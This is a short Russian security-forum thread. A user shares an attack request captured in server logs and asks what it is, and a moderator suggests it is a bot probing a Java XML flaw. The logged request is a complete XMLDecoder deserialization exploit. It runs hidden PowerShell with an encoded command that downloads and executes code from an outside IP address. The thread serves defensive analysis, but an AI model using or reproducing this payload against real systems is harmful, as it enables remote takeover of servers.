• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Решено наблюдал интересную атаку...

08.11.2016
945
2 712
#1
Код:
soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/">
\n<soapenv:Header>
\n<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
\n<java version="1.8.0_131" class="java.beans.XMLDecoder">
\n<void class="java.lang.ProcessBuilder">
\n  <array class="java.lang.String" length="3">
\n    <void index="0">
\n      <string>cmd.exe</string>
\n    </void>
\n    <void index="1">
\n      <string>/c</string>
\n    </void>
\n    <void index="2">
\n      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
\n    </void>
\n  </array>
\n    <void method="start"/>
\n</void>
\n</java>
\n</work:WorkContext>
\n</soapenv:Header>
\n<soapenv:Body/>
\n</soapenv:Envelope>
\n

вот что попало в логи, одного из серверов, атака шла от китайского IP адреса ) понятно что задействован powershell и js или java

возможно я спалил методику атаки... давайте разберемся!

кто что скажет?
 

Dr.Lafa

Mod. Hardware
Gold Team
30.12.2016
440
833
#3
Скорее всего бот гуляет по интернету и пытается проэксплуатировать дырку в каком-то java-приложении, которое обрабатывает xml.
Подобный эксплоит есть для Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass. CVE_2017_12617
Но тут какая-то другая уязвимость
 
Вверх Снизу